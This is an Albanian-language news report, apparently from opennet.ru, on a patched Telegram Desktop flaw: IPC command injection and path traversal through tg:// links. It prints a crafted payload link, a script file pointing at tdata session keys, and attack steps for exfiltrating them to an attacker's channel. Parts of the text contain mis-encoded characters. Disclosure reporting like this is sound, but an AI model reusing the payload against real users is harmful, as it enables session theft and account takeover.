Një vulnerabilitet në Telegram Desktop, që lejon dërgimin e skedarëve të arbitrueshëm me një klikim në lidhje

Detajet dhe metoda e shfrytëzimit të dobësisë (CVE-2026-107181) në Telegram Desktop, klienti zyrtar i Telegram për sisteme desktop. Problemi shkaktohet nga mungesa e trajtimit të duhur të simboleve të ndarësve të paekranuar në komandat IPC, të cilat lejonin që me një klikim mbi lidhjen e dërguar, të mund të organizohej transferimi i çdo dosjeje nga sistemi i viktimës te sulmuesi, përfshirë dosjet me çelësat e sesionit, që mund të përdoren për të kapur llogarinë në Telegram. Dobësia është eliminuar në versionin Telegram Desktop 7.2.9.

Me një klikim mbi lidhjet "tg://", sistemi operativ aktivizon aplikacionin Telegram Desktop të lidhur me këtë lloj lidhjesh. Nëse një instancë tjetër e këtij aplikacioni është tashmë e hapur në sistem, procesi i hapur i dërgon lidhjen përmes socket-it përmes ndërfaqes IPC. Problemi është se, nëse në mes të parametrave të lidhjes është specifikuar simboli ";" (p.sh., "tg://x?a=1;OPEN
"), përmbajtja ndahet dhe pjesët që ndodhin pas simbolit ";" trajtohen si komanda të ndara.

Për realizimin e sulmit është angazhuar komanda OPEN së bashku me skemën URI "interpret:", e parashikuar për të aktivizuar skriptet shërbyese përmes IPC, të cilat janë përdorur për dërgimin automatik të lëshimeve të reja në kanale. Skripti përbëhet nga një dosje lokale e paracaktuar, në të cilën është specifikuar dosja e dërguar në kanal dhe identifikuesi i kanalit. Rruga e dosjes për skriptet trajtohet në lidhje me nënkatalogun shërbyes, por për shkak të mungesës së pastrimit të "..\/" në rrugët e dosjeve, sulmuesi ka mundësinë të aksesojë dosjet e ruajtura jashtë katalogut bazë. Për shembull, mund të ngarkohet një dosje në grupin e tij në telegram, pas së cilës mund të referohet në këtë dosje si skript, duke e përgatitur një lidhje të tipit:

tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt

Hapat e realizimit të sulmit:

  • Sulmuesi shton viktimĂ«n nĂ« grupin e tij (nĂ« kufijtĂ« e cilĂ«simeve tĂ« zakonshme, shtimi nuk kĂ«rkon konfirmim nga i shtuar) dhe dĂ«rgon nĂ« kĂ«tĂ« grup njĂ« dosje teksti, nĂ« tĂ« cilĂ«n Ă«shtĂ« specifikuar kanali dhe rruga e skriptit. Telegram do ta ruajĂ« kĂ«tĂ« dosje nĂ« njĂ« nĂ«nkatalog tĂ« paracaktuar sistemor kur viktima tĂ« hyjĂ« nĂ« grup.

    kanali: 2005234537
    dosja: tdata/D877F783D5D3EF8Cs

  • Sulmuesi i dĂ«rgon viktimĂ«s njĂ« lidhje me pamje tĂ« pafajshme pĂ«r hostin e tij (p.sh., "https://coolsite.org"), e cila, kur hapet pĂ«rmes ridrejtimit nĂ« server sulmuesin zĂ«vendĂ«sohet me njĂ« URI tĂ« tipit 'tg://x?a=1;OPEN:interpret:...;OPEN:interpret:...'
  • Kur klikoni nĂ« link, shfletuesi thĂ«rret trajtuesin e URI «tg://», duke nisur zinxhirin e komandave tĂ« pĂ«rmendura mĂ« lart, i cili çon nĂ« dĂ«rgimin e skedarĂ«ve nĂ« kanalin e sulmuesit pa ndonjĂ« njoftim dhe pa kĂ«rkuar konfirmimin pĂ«r dĂ«rgimin.
  • Duke marrĂ« skedarĂ«t nga nĂ«nkatalogu tdata me çelĂ«sat e enkriptimit dhe autorizimit, nĂ« mungesĂ« tĂ« njĂ« kode lokal tĂ« vendosur nga pĂ«rdoruesi, sulmuesi mund tĂ« klonojĂ« seancĂ«n e lidhjes sĂ« viktimĂ«s nĂ« pajisjen e tij.

Burimi: opennet.ru

Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster